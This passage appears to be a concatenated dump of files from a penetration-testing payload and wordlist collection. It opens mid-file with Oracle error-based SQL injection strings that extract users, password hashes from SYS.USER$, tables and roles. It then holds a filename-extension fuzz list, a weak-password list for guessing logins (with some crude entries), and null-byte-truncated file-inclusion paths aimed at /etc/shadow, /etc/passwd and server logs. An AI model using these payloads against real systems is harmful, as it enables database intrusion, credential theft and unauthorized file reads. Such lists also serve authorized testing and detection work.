26 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=3)) AND 'i'='i
27 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=3)) AND 'i'='i
28 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=3)) AND 'i'='i
29 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=3)) AND 'i'='i
30 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=3)) AND 'i'='i
31 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=4)) AND 'i'='i
32 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=4)) AND 'i'='i
33 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=4)) AND 'i'='i
34 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=4)) AND 'i'='i
35 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=4)) AND 'i'='i
36 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=5)) AND 'i'='i
37 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=5)) AND 'i'='i
38 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=5)) AND 'i'='i
39 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=5)) AND 'i'='i
40 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=5)) AND 'i'='i
41 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=6)) AND 'i'='i
42 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=6)) AND 'i'='i
43 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=6)) AND 'i'='i
44 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=6)) AND 'i'='i
45 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=6)) AND 'i'='i
46 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=7)) AND 'i'='i
47 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=7)) AND 'i'='i
48 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=7)) AND 'i'='i
49 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=7)) AND 'i'='i
50 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=7)) AND 'i'='i
51 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=8)) AND 'i'='i
52 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=8)) AND 'i'='i
53 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=8)) AND 'i'='i
54 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=8)) AND 'i'='i
55 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=8)) AND 'i'='i
56 |
57 |
--------------------------------------------------------------------------------
/信息探测/FilenameBruteforce/Extensions.Common.fuzz.txt:
--------------------------------------------------------------------------------
1 | $er
2 | 123
3 | 1pe
4 | 1ph
5 | 3dr
6 | 3dt
7 | 3me
8 | 3pe
9 | 4dl
10 | 4dv
11 | 8xk
12 | ^^^
13 | a3l
14 | a3m
15 | a3w
16 | a4l
17 | a4m
18 | a4w
19 | a5l
20 | a5w
21 | a65
22 | aao
23 | ab
24 | ab1
25 | ab2
26 | ab3
27 | abcd
28 | abi
29 | abp
30 | aby
31 | aca
32 | acc
33 | accdb
34 | acf
35 | acg
36 | ade
37 | adp
38 | adt
39 | adx
40 | aft
41 | agd
42 | aifb
43 | alc
44 | ald
45 | ali
46 | amb
47 | amsorm
48 | an1
49 | anme
50 | apr
51 | arc
52 | arh
53 | ask
54 | asm
55 | ast
56 | at5
57 | att
58 | aw
59 | awg
60 | azw
61 | bafl
62 | bci
63 | bcm
64 | bdf
65 | bdic
66 | bfx
67 | bgl
68 | bgt
69 | bin
70 | bjo
71 | bk
72 | bkk
73 | blb
74 | bld
75 | blg
76 | bok
77 | box
78 | brd
79 | brw
80 | btf
81 | btif
82 | btm
83 | btr
84 | cap
85 | cat
86 | cbg
87 | cch
88 | ccr
89 | cct
90 | cdb
91 | cdd
92 | cdf
93 | cdp
94 | cdr
95 | cdx
96 | cel
97 | celtx
98 | chg
99 | chk
100 | chn
101 | ckd
102 | ckt
103 | cl2
104 | cl4
105 | clb
106 | clix
107 | clm
108 | clp
109 | cmbl
110 | cna
111 | contact
112 | cpi
113 | cpmz
114 | crd
115 | crtx
116 | csa
117 | csv
118 | ctf
119 | ctt
120 | cursorfx
121 | curxptheme
122 | cvd
123 | cvn
124 | cwk
125 | cws
126 | cwz
127 | cxt
128 | cyo
129 | cys
130 | daf
131 | dal
132 | dam
133 | das
134 | dat
135 | data
136 | db
137 | db2
138 | db3
139 | dbc
140 | dbd
141 | dbf
142 | dbx
143 | dcf
144 | dcl
145 | dcm
146 | dcmd
147 | ddc
148 | ddcx
149 | ddt
150 | dem
151 | des
152 | dex
153 | dfm
154 | dfproj
155 | dft
156 | dgb
157 | dif
158 | dii
159 | dlg
160 | dm2
161 | dmo
162 | dmsk
163 | dnc
164 | dockzip
165 | dp1
166 | dpn
167 | dpx
168 | drl
169 | dsb
170 | dsd
171 | dsk
172 | dsy
173 | dsz
174 | dt0
175 | dt1
176 | dt2
177 | dta
178 | dtr
179 | dvdproj
180 | dvo
181 | dwi
182 | e00
183 | eap
184 | ebuild
185 | ec0
186 | eco
187 | ecx
188 | edb
189 | edf
190 | eep
191 | efx
192 | egp
193 | emb
194 | emd
195 | emlxpart
196 | enc
197 | enw
198 | epp
199 | epub
200 | epw
201 | er1
202 | esp
203 | ess
204 | est
205 | esx
206 | et
207 | eta
208 | etd
209 | etl
210 | ev
211 | ev3
212 | evt
213 | evy
214 | exif
215 | exp
216 | exx
217 | fa
218 | fasta
219 | fbl
220 | fcd
221 | fcs
222 | fdb
223 | ffd
224 | ffwp
225 | fhc
226 | fid
227 | fil
228 | flame
229 | fll
230 | flo
231 | flp
232 | flt
233 | fm
234 | fm5
235 | fmp
236 | fo
237 | fob
238 | fol
239 | fop
240 | fox
241 | fp
242 | fp3
243 | fp4
244 | fp5
245 | fp7
246 | frl
247 | frm
248 | fro
249 | frx
250 | fsb
251 | fsc
252 | ftm
253 | ftw
254 | gan
255 | gbr
256 | gc
257 | gcx
258 | gdb
259 | ged
260 | gedcom
261 | gen
262 | ggb
263 | gml
264 | gms
265 | gno
266 | gnp
267 | gp3
268 | gpi
269 | gps
270 | gpx
271 | gra
272 | grade
273 | grf
274 | grib
275 | grk
276 | grr
277 | grv
278 | gs
279 | gst
280 | gtp
281 | gwk
282 | gxl
283 | hcc
284 | hce
285 | hci
286 | hcp
287 | hcr
288 | hcu
289 | hda
290 | hdb
291 | hdf
292 | hdi
293 | hdl
294 | hif
295 | hl
296 | hml
297 | hmt
298 | hs2
299 | hsk
300 | hst
301 | htg
302 | huh
303 | hyv
304 | i5z
305 | ib
306 | ics
307 | id2
308 | idx
309 | igc
310 | ihx
311 | ii
312 | iif
313 | img
314 | imt
315 | ink
316 | inp
317 | ins
318 | ip
319 | irock
320 | irr
321 | irx
322 | isf
323 | itdb
324 | itl
325 | itm
326 | itn
327 | itw
328 | itx
329 | ivt
330 | iw
331 | ixb
332 | jasper
333 | jdb
334 | jef
335 | jmp
336 | jnt
337 | job
338 | joboptions
339 | joined
340 | jph
341 | jrprint
342 | jrxml
343 | jude
344 | kap
345 | kdb
346 | kid
347 | kismac
348 | kmz
349 | kpf
350 | kpp
351 | kpr
352 | kpx
353 | kpz
354 | l
355 | l6t
356 | laccdb
357 | lbl
358 | lbx
359 | lcd
360 | lcf
361 | lcm
362 | ldif
363 | lex
364 | lgc
365 | lgf
366 | lgh
367 | lgi
368 | lgl
369 | lib
370 | lif
371 | livereg
372 | liveupdate
373 | lix
374 | llb
375 | lms
376 | lmx
377 | lnt
378 | loc
379 | lp7
380 | lrf
381 | lrs
382 | lrx
383 | lsf
384 | lsl
385 | lsp
386 | lsr
387 | lst
388 | lsu
389 | lvm
390 | lw4
391 | ly
392 | m
393 | mag
394 | mai
395 | map
396 | masseffectprofile
397 | mat
398 | mbb
399 | mbf
400 | mbg
401 | mbl
402 | mbp
403 | mbx
404 | mc1
405 | mc9
406 | mcd
407 | md
408 | mdb
409 | mdc
410 | mdf
411 | mdl
412 | mdm
413 | mdn
414 | mdt
415 | mdx
416 | mdz
417 | mem
418 | menc
419 | met
420 | mex
421 | mfo
422 | mfp
423 | mgc
424 | mls
425 | mm
426 | mmap
427 | mmc
428 | mmf
429 | mmp
430 | mnc
431 | mng
432 | mnk
433 | mno
434 | mny
435 | mobi
436 | moho
437 | mosaic
438 | mox
439 | mpd
440 | mpj
441 | mpp
442 | mpt
443 | mpx
444 | mpz
445 | mq4
446 | ms10
447 | mth
448 | mtw
449 | mud
450 | muf
451 | mw
452 | mwf
453 | mws
454 | mwx
455 | mxd
456 | myd
457 | myi
458 | nb
459 | nc
460 | ndf
461 | ndk
462 | ndx
463 | net
464 | neta
465 | nfo
466 | nitf
467 | nmind
468 | not
469 | notebook
470 | np
471 | npl
472 | npt
473 | nrl
474 | ns2
475 | ns3
476 | ns4
477 | nsf
478 | ntx
479 | numbers
480 | nvl
481 | nyf
482 | oab
483 | obj
484 | odb
485 | odf
486 | odp
487 | ods
488 | odx
489 | oeaccount
490 | ofc
491 | ofm
492 | oft
493 | ofx
494 | omcs
495 | omp
496 | ond
497 | one
498 | oo3
499 | opf
500 | opx
501 | or2
502 | or3
503 | or4
504 | or5
505 | or6
506 | org
507 | orx
508 | otf
509 | otl
510 | otln
511 | ots
512 | out
513 | ov2
514 | ova
515 | ovf
516 | p96
517 | p97
518 | pab
519 | paf
520 | pan
521 | pbd
522 | pc
523 | pcap
524 | pcb
525 | pcr
526 | pd4
527 | pd5
528 | pdas
529 | pdb
530 | pdd
531 | pdm
532 | pds
533 | pdx
534 | peb
535 | pec
536 | pep
537 | pex
538 | pfc
539 | pfl
540 | phb
541 | phm
542 | pi
543 | pis
544 | pjx
545 | pka
546 | pkb
547 | pkh
548 | pks
549 | pkt
550 | pln
551 | plw
552 | pmo
553 | pmr
554 | pnproj
555 | pnpt
556 | pns
557 | pnt
558 | pod
559 | poi
560 | pos
561 | postal
562 | pot
563 | potm
564 | potx
565 | pp2
566 | ppf
567 | pps
568 | ppsx
569 | ppt
570 | pptm
571 | pptx
572 | prc
573 | pre
574 | prf
575 | prj
576 | prm
577 | prs
578 | psa
579 | psf
580 | psm
581 | pst
582 | ptb
583 | ptf
584 | ptk
585 | ptm
586 | ptn
587 | ptt
588 | ptz
589 | pvl
590 | pwd
591 | pxj
592 | pxl
593 | q07
594 | q08
595 | q09
596 | q3d
597 | qbw
598 | qdat
599 | qdf
600 | qdfm
601 | qel
602 | qfx
603 | qif
604 | qpb
605 | qpf
606 | qph
607 | qpm
608 | qpw
609 | qrp
610 | qsd
611 | ral
612 | rbt
613 | rcd
614 | rcg
615 | rdb
616 | rdf
617 | rdx
618 | ref
619 | ret
620 | rf1
621 | rfa
622 | rfo
623 | rge
624 | rgn
625 | rgo
626 | rmuf
627 | rnq
628 | rod
629 | rog
630 | roi
631 | rou
632 | rpp
633 | rpt
634 | rrt
635 | rsc
636 | rsd
637 | rsw
638 | rte
639 | rvt
640 | rwg
641 | rzb
642 | s85
643 | saf
644 | sam07
645 | sar
646 | sav
647 | sbd
648 | sbf
649 | sbq
650 | sbt
651 | sca
652 | scf
653 | sch
654 | sdb
655 | sdc
656 | sdf
657 | sdp
658 | sdq
659 | sds
660 | sen
661 | seo
662 | seq
663 | ser
664 | sgml
665 | sgn
666 | shp
667 | shs
668 | shx
669 | skc
670 | skv
671 | skx
672 | sle
673 | slk
674 | slp
675 | snapfireshow
676 | sonic
677 | soundpack
678 | spo
679 | sps
680 | spub
681 | spv
682 | sq
683 | sqd
684 | sql
685 | sqlite
686 | sqr
687 | sta
688 | stc
689 | stf
690 | stk
691 | stl
692 | stm
693 | stp
694 | str
695 | stt
696 | stw
697 | styk
698 | stykz
699 | swk
700 | sxc
701 | sxi
702 | sy3
703 | t01
704 | t02
705 | t03
706 | t04
707 | t05
708 | t06
709 | t07
710 | t08
711 | t09
712 | t2
713 | t3001
714 | tax2008
715 | tax2009
716 | tb
717 | tbk
718 | tbl
719 | tcc
720 | tcx
721 | tda
722 | tdl
723 | tdm
724 | tdt
725 | te
726 | te3
727 | teacher
728 | tef
729 | tet
730 | tfa
731 | tfd
732 | tfrd
733 | tjp
734 | tk3
735 | tkfl
736 | tmw
737 | tol
738 | topc
739 | tpb
740 | tps
741 | tr3
742 | tra
743 | trd
744 | trk
745 | trs
746 | trx
747 | tst
748 | tsv
749 | ttk
750 | txa
751 | txd
752 | txf
753 | uccapilog
754 | ud
755 | udb
756 | udeb
757 | uds
758 | ulf
759 | ulz
760 | update
761 | upoi
762 | usr
763 | uvf
764 | uwl
765 | val
766 | vbpf1
767 | vcd
768 | vce
769 | vcf
770 | vcs
771 | vdb
772 | vdx
773 | vfs
774 | vi
775 | vip
776 | vle
777 | vlg
778 | vmt
779 | voi
780 | vok
781 | vrd
782 | vscontent
783 | vsx
784 | vtx
785 | vxml
786 | w02
787 | wab
788 | wb1
789 | wb2
790 | wb3
791 | wdb
792 | wdq
793 | wea
794 | wfd
795 | wfm
796 | wgp
797 | wgt
798 | windowslivecontact
799 | wjr
800 | wk1
801 | wk2
802 | wk3
803 | wk4
804 | wk5
805 | wke
806 | wki
807 | wks
808 | wku
809 | wlmp
810 | wmdb
811 | wor
812 | wpc
813 | wpf
814 | wpo
815 | wq1
816 | wq2
817 | wtb
818 | wtr
819 | xbk
820 | xdb
821 | xdp
822 | xds
823 | xef
824 | xem
825 | xfd
826 | xfo
827 | xft
828 | xl
829 | xlc
830 | xlgc
831 | xlr
832 | xls
833 | xlsb
834 | xlsm
835 | xlsx
836 | xlt
837 | xltm
838 | xltx
839 | xlw
840 | xmcd
841 | xml
842 | xmlper
843 | xmpz
844 | xpg
845 | xpj
846 | xpm
847 | xpt
848 | xrp
849 | xsl
850 | xslt
851 | xsn
852 | xtm
853 | xtp
854 | xxd
855 | yam
856 | zap
857 | zdb
858 | zdc
859 | zix
860 | zmc
861 | zpl
862 | {pb
863 | ~hm
864 |
--------------------------------------------------------------------------------
/wordlists-user-passwd/passwds/weaksauce.txt:
--------------------------------------------------------------------------------
1 | !root
2 | 0
3 | 0000
4 | 1
5 | 10
6 | 100
7 | 11
8 | 1111
9 | 11111
10 | 111111
11 | 11111111
12 | 112233
13 | 12
14 | 1212
15 | 121212
16 | 123
17 | 123123
18 | 1234
19 | 12345
20 | 123456
21 | 123456
22 | 1234567
23 | 1234567
24 | 12345678
25 | 12345678
26 | 123456789
27 | 1234admin
28 | 123asdf
29 | 123go
30 | 13
31 | 1313
32 | 131313
33 | 14
34 | 15
35 | 16
36 | 17
37 | 18
38 | 19
39 | 2
40 | 20
41 | 2000
42 | 21
43 | 2112
44 | 22
45 | 2222
46 | 23
47 | 232323
48 | 24
49 | 25
50 | 26
51 | 27
52 | 28
53 | 29
54 | 3
55 | 30
56 | 31
57 | 32
58 | 33
59 | 3333
60 | 34
61 | 35
62 | 36
63 | 37
64 | 38
65 | 39
66 | 4
67 | 40
68 | 41
69 | 4128
70 | 42
71 | 43
72 | 4321
73 | 44
74 | 4444
75 | 45
76 | 46
77 | 47
78 | 48
79 | 49
80 | 5
81 | 50
82 | 51
83 | 5150
84 | 52
85 | 53
86 | 54
87 | 55
88 | 5555
89 | 56
90 | 57
91 | 58
92 | 59
93 | 6
94 | 60
95 | 61
96 | 62
97 | 63
98 | 64
99 | 65
100 | 654321
101 | 66
102 | 6666
103 | 666666
104 | 67
105 | 68
106 | 69
107 | 6969
108 | 696969
109 | 7
110 | 70
111 | 71
112 | 72
113 | 73
114 | 74
115 | 75
116 | 76
117 | 77
118 | 7777
119 | 777777
120 | 7777777
121 | 78
122 | 79
123 | 8
124 | 80
125 | 81
126 | 82
127 | 83
128 | 84
129 | 85
130 | 86
131 | 8675309
132 | 87
133 | 88
134 | 89
135 | 9
136 | 90
137 | 91
138 | 92
139 | 93
140 | 94
141 | 95
142 | 96
143 | 97
144 | 98
145 | 987654
146 | 99
147 | ADMIN
148 | Admin
149 | Admin
150 | Administator
151 | Demo
152 | KKKKKKK
153 | Manager
154 | PASSWORD
155 | Qwerty
156 | TEST
157 | aaaa
158 | aaaaaa
159 | abc123
160 | abd234
161 | abgrtyu
162 | access
163 | access14
164 | action
165 | adm
166 | admin
167 | admin
168 | administator
169 | administrator
170 | admn
171 | albert
172 | alex
173 | alexis
174 | amanda
175 | amateur
176 | andrea
177 | andrew
178 | angel
179 | angela
180 | angels
181 | animal
182 | anthony
183 | apollo
184 | apple
185 | apples
186 | arsenal
187 | arthur
188 | asdf
189 | asdf123
190 | asdfg
191 | asdfgh
192 | ashley
193 | asshole
194 | august
195 | austin
196 | baby
197 | backup
198 | backupexec
199 | badboy
200 | bailey
201 | banana
202 | barney
203 | baseball
204 | batman
205 | beach
206 | bear
207 | beaver
208 | beavis
209 | beer
210 | bigcock
211 | bigdaddy
212 | bigdick
213 | bigdog
214 | bigtits
215 | bill
216 | billy
217 | birdie
218 | bitch
219 | bitches
220 | biteme
221 | black
222 | blank
223 | blazer
224 | blonde
225 | blondes
226 | blowjob
227 | blowme
228 | blue
229 | bond007
230 | bonnie
231 | booboo
232 | boobs
233 | booger
234 | boomer
235 | booty
236 | boston
237 | brandon
238 | brandy
239 | braves
240 | brazil
241 | brian
242 | bronco
243 | broncos
244 | bubba
245 | buddy
246 | bulldog
247 | buster
248 | butter
249 | butthead
250 | calvin
251 | camaro
252 | cameron
253 | canada
254 | captain
255 | carlos
256 | carter
257 | casper
258 | changeme
259 | charles
260 | charlie
261 | cheese
262 | chelsea
263 | chester
264 | chevy
265 | chicago
266 | chicken
267 | chris
268 | cisco
269 | clustadm
270 | cluster
271 | cocacola
272 | cock
273 | coffee
274 | college
275 | compaq
276 | compaq
277 | computer
278 | cookie
279 | cookie123
280 | cool
281 | cooper
282 | correct
283 | corvette
284 | cowboy
285 | cowboys
286 | cream
287 | crystal
288 | cumming
289 | cumshot
290 | cunt
291 | dakota
292 | dallas
293 | daniel
294 | danielle
295 | dave
296 | david
297 | debbie
298 | default
299 | default
300 | dell
301 | demo
302 | dennis
303 | diablo
304 | diamond
305 | dick
306 | dirty
307 | dmz
308 | doctor
309 | doggie
310 | dolphin
311 | dolphins
312 | domino
313 | donald
314 | dragon
315 | dreams
316 | driver
317 | eagle
318 | eagle1
319 | eagles
320 | eatdirt
321 | edward
322 | einstein
323 | enjoy
324 | enter
325 | eric
326 | erotic
327 | exchadm
328 | exchange
329 | extreme
330 | falcon
331 | fender
332 | ferrari
333 | fiction
334 | fire
335 | firebird
336 | fish
337 | fishing
338 | florida
339 | flower
340 | flyers
341 | foobar
342 | football
343 | ford
344 | forever
345 | frank
346 | fred
347 | freddy
348 | freedom
349 | ftp
350 | fuck
351 | fucked
352 | fucker
353 | fucking
354 | fuckme
355 | fuckyou
356 | fuckyou1
357 | gandalf
358 | gateway
359 | gateway
360 | gators
361 | gemini
362 | george
363 | giants
364 | ginger
365 | girl
366 | girls
367 | god
368 | golden
369 | golf
370 | golfer
371 | gordon
372 | great
373 | green
374 | gregory
375 | guest
376 | guest
377 | guitar
378 | gunner
379 | guru
380 | hammer
381 | hannah
382 | happy
383 | hardcore
384 | harley
385 | heather
386 | hello
387 | helpme
388 | hentai
389 | hockey
390 | hooters
391 | horney
392 | horny
393 | hotdog
394 | house
395 | hunter
396 | hunting
397 | iceman
398 | iloveyou
399 | iloveyou1
400 | internet
401 | iwantu
402 | jack
403 | jackie
404 | jackson
405 | jaguar
406 | jake
407 | james
408 | japan
409 | jasmine
410 | jason
411 | jasper
412 | jennifer
413 | jeremy
414 | jessica
415 | john
416 | johnny
417 | johnson
418 | jordan
419 | joseph
420 | joshua
421 | juice
422 | junior
423 | justin
424 | kelly
425 | kevin
426 | killer
427 | king
428 | kitty
429 | knight
430 | ladies
431 | lakers
432 | lauren
433 | leather
434 | legend
435 | letmein
436 | little
437 | login
438 | london
439 | lotus
440 | love
441 | lover
442 | lovers
443 | lucky
444 | lust
445 | maddog
446 | madison
447 | maggie
448 | magic
449 | magnum
450 | mail
451 | manager
452 | marine
453 | mark
454 | marlboro
455 | martin
456 | marvin
457 | master
458 | matrix
459 | matt
460 | matthew
461 | maverick
462 | maxwell
463 | melissa
464 | member
465 | mercedes
466 | merlin
467 | michael
468 | michelle
469 | mickey
470 | midnight
471 | mike
472 | miller
473 | mine
474 | miss4you
475 | mistress
476 | money
477 | money
478 | monica
479 | monitor
480 | monkey
481 | monster
482 | morgan
483 | mother
484 | mountain
485 | movie
486 | muffin
487 | murphy
488 | music
489 | mustang
490 | naked
491 | nascar
492 | nathan
493 | naughty
494 | ncc1701
495 | neo
496 | newpass
497 | newuser
498 | newyork
499 | nicholas
500 | nicole
501 | nipple
502 | nipples
503 | no
504 | none
505 | nopassword
506 | notes
507 | office
508 | oliver
509 | oracle
510 | orange
511 | ou812
512 | paSSworD
513 | packers
514 | panther
515 | panties
516 | paris
517 | parker
518 | pass
519 | pass
520 | passcode
521 | passwd
522 | password
523 | password
524 | password!
525 | password1
526 | password1
527 | patrick
528 | paul
529 | peaches
530 | peanut
531 | penis
532 | pepper
533 | peter
534 | phantom
535 | phoenix
536 | player
537 | please
538 | poiqwe
539 | pookie
540 | porn
541 | porno
542 | porsche
543 | power
544 | prince
545 | princess
546 | print
547 | private
548 | purple
549 | pussies
550 | pussy
551 | qazwsx
552 | qweasd
553 | qwert
554 | qwerty
555 | qwerty
556 | qwertyui
557 | rabbit
558 | rachel
559 | racing
560 | raiders
561 | rainbow
562 | ranger
563 | rangers
564 | read
565 | rebecca
566 | redskins
567 | redsox
568 | redwings
569 | replicate
570 | richard
571 | robert
572 | rock
573 | rocket
574 | root
575 | rosebud
576 | runner
577 | rush2112
578 | russia
579 | sa
580 | samantha
581 | sammy
582 | samson
583 | sandra
584 | saturn
585 | scooby
586 | scooter
587 | scorpio
588 | scorpion
589 | scott
590 | seagate
591 | secret
592 | secret
593 | security
594 | setup
595 | sex
596 | sexsex
597 | sexy
598 | shadow
599 | shannon
600 | shaved
601 | shit
602 | sierra
603 | silver
604 | skippy
605 | slayer
606 | slut
607 | smith
608 | smokey
609 | snoopy
610 | soccer
611 | sophie
612 | space
613 | spanky
614 | sparky
615 | spider
616 | sql
617 | sqlexec
618 | squirt
619 | srinivas
620 | star
621 | stars
622 | startrek
623 | starwars
624 | steelers
625 | steve
626 | steven
627 | sticky
628 | stupid
629 | success
630 | suckit
631 | summer
632 | sunshine
633 | super
634 | superman
635 | superuser
636 | surfer
637 | swimming
638 | sydney
639 | sys
640 | sysadm
641 | sysadmin
642 | system
643 | taylor
644 | tech
645 | teens
646 | temp
647 | temp
648 | temp!
649 | temp123
650 | tennis
651 | teresa
652 | test
653 | test
654 | test!
655 | test123
656 | tester
657 | testing
658 | theman
659 | thomas
660 | thunder
661 | thx1138
662 | tiffany
663 | tiger
664 | tigers
665 | tigger
666 | time
667 | tits
668 | tivoli
669 | tmp
670 | tomcat
671 | toor
672 | top
673 | topgun
674 | toyota
675 | travis
676 | trouble
677 | trustno1
678 | tst
679 | tucker
680 | turtle
681 | united
682 | user
683 | vagina
684 | veritas
685 | victor
686 | victoria
687 | video
688 | viking
689 | viper
690 | virus
691 | voodoo
692 | voyager
693 | walter
694 | warrior
695 | web
696 | welcome
697 | whatever
698 | white
699 | william
700 | willie
701 | wilson
702 | winner
703 | winston
704 | winter
705 | wizard
706 | wolf
707 | women
708 | wordpass
709 | write
710 | www
711 | xavier
712 | xxx
713 | xxxx
714 | xxxxx
715 | xxxxxx
716 | xxxxxxxx
717 | yamaha
718 | yankee
719 | yankees
720 | yellow
721 | young
722 | zxcvbn
723 | zxcvbnm
724 | zzzzzz
725 |
--------------------------------------------------------------------------------
/文件包含测试/敏感文件包含(带截断).txt:
--------------------------------------------------------------------------------
1 | /etc/passwd%00
2 | /etc/passwd%00
3 | /etc/shadow%00
4 | /etc/group%00
5 | /etc/security/group%00
6 | /etc/security/passwd%00
7 | /etc/security/user%00
8 | /etc/security/environ%00
9 | /etc/security/limits%00
10 | /usr/lib/security/mkuser.default%00
11 | /apache/logs/access.log%00
12 | /apache/logs/error.log%00
13 | /apache/logs/access.log%00
14 | /apache/logs/error.log%00
15 | /apache/logs/access.log%00
16 | /etc/httpd/logs/acces_log%00
17 | /etc/httpd/logs/acces.log%00
18 | /etc/httpd/logs/error_log%00
19 | /etc/httpd/logs/error.log%00
20 | /var/www/logs/access_log%00
21 | /var/www/logs/access.log%00
22 | /usr/local/apache/logs/access_ log%00
23 | /usr/local/apache/logs/access. log%00
24 | /var/log/apache/access_log%00
25 | /var/log/apache2/access_log%00
26 | /var/log/apache/access.log%00
27 | /var/log/apache2/access.log%00
28 | /var/log/access_log%00
29 | /var/log/access.log%00
30 | /var/www/logs/error_log%00
31 | /var/www/logs/error.log%00
32 | /usr/local/apache/logs/error_log%00
33 | /usr/local/apache/logs/error.log%00
34 | /var/log/apache/error_log%00
35 | /var/log/apache2/error_log%00
36 | /var/log/apache/error.log%00
37 | /var/log/apache2/error.log%00
38 | /var/log/error_log%00
39 | /var/log/error.log%00
40 | /var/log/httpd/access_log%00
41 | /var/log/httpd/error_log%00
42 | /var/log/httpd/access_log%00
43 | /var/log/httpd/error_log%00
44 | /apache/logs/error.log%00
45 | /apache/logs/access.log%00
46 | /apache/logs/error.log%00
47 | /apache/logs/access.log%00
48 | /apache/logs/error.log%00
49 | /apache/logs/access.log%00
50 | /apache/logs/error.log%00
51 | /apache/logs/access.log%00
52 | /apache/logs/error.log%00
53 | /apache/logs/access.log%00
54 | /apache2/logs/error.log%00
55 | /apache2/logs/access.log%00
56 | /apache2/logs/error.log%00
57 | /apache2/logs/access.log%00
